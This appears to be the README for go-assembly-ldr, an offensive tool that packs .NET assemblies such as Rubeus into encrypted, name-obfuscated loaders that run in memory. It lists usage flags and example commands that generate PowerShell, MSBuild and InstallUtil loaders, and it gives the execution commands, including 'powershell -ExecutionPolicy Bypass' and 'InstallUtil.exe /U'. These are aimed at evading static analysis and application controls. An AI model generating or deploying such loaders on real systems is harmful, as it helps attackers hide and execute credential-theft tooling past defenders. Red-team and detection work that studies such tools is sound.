.:: go-assembly-ldr: Encrypted .NET Assembly Loaders ::.

[ Introduction ]

go-assembly-ldr facilitates the creation of loaders that embed encrypted .NET
assemblies, which are decrypted and executed in memory at runtime. It supports
two encryption methods—RC4 for lightweight obfuscation and AES-256 for stronger
security. The tool also randomizes variable names in generated loaders, making
static analysis more difficult. With flexible output formats (PowerShell,
MSBuild, or InstallUtil), it caters to various execution contexts, such as
script-based or build-process exploitation.

The tool’s source code is available at https://cgit.heqnx.com/go-assembly-ldr
and can be cloned with git clone https://cgit.heqnx.com/go-assembly-ldr.

[ Tool Usage ]

$ ./go-assembly-ldr-<platform>-<arch> -h
offensive security tool designed for generating encrypted and obfuscated loaders for .NET assemblies

author: heqnx - https://heqnx.com

usage of ./go-assembly-ldr-<platform>-<arch>:
  -dotnet-architecture string
        .net architecture for msbuild: x86|x64 (default "x64")
  -e string
        encryption type: rc4|aes (default "rc4")
  -f string
        input file path
  -key-len int
        length of encryption key (default 32)
  -obf-len int
        length of obfuscated strings (default 8)
  -t string
        loader type: powershell|msbuild|installutil (default "powershell")

[ Tool Output Example ]

- Generate a PowerShell loader with AES encryption:

$ ./build/go-assembly-ldr-linux-amd64 \
        -f Rubeus.exe \
        -t powershell \
        -e aes \
        -obf-len 10 \
        -key-len 32
[inf] created "Rubeus.exe_reflective.ps1" containing "Rubeus.exe"
[inf] call assembly method with [<namespace>.<class>]::<method>("arg1 arg2".Split())

- Generate an MSBuild loader with RC4 encryption:

$ ./build/go-assembly-ldr-linux-amd64 \
        -f Rubeus.exe \
        -t msbuild \
        -e rc4 \
        -obf-len 12 \
        -key-len 16 \
        -dotnet-architecture x86
[inf] created "Rubeus.exe_msbuild.csproj" containing "Rubeus.exe"
[inf] change "string[] <var> = new string[] { "" };" to add arguments

[ Payload Execution ]

The tool generates loaders that decrypt and execute .NET assemblies in memory,
leveraging .NET’s Reflection.Assembly.Load for seamless execution. Each loader
type targets a specific execution context:PowerShell:

- Executes via powershell -ExecutionPolicy Bypass -File <file>.ps1. Suitable
  for script-based environments
- MSBuild: Executes via msbuild.exe <file>.csproj. Ideal for build process
  exploitation. Modify the string[] array to pass arguments
- InstallUtil: Compiles to a .NET executable with csc.exe and executes via
  InstallUtil.exe /U. Leverages the uninstall method for payload execution.

[ Technical Details ]

- Encryption: RC4 is a stream cipher for lightweight encryption; AES-256 (CBC
  mode, PKCS7 padding) offers stronger security. AES requires a 32-byte key,
  while RC4 supports variable key lengths.
- Obfuscation: Variable names are replaced with random strings of
  user-specified length, applied to templates using a regex-based substitution
  (<%=obf ... %>).
- Payload Handling: Assemblies are base64-encoded post-encryption, with
  decryption logic embedded in the loader. AES includes an initialization
  vector (IV) for secure decryption.
- Dependencies: Relies on Go’s crypto/aes, crypto/rand, and standard libraries
  for encryption and file handling.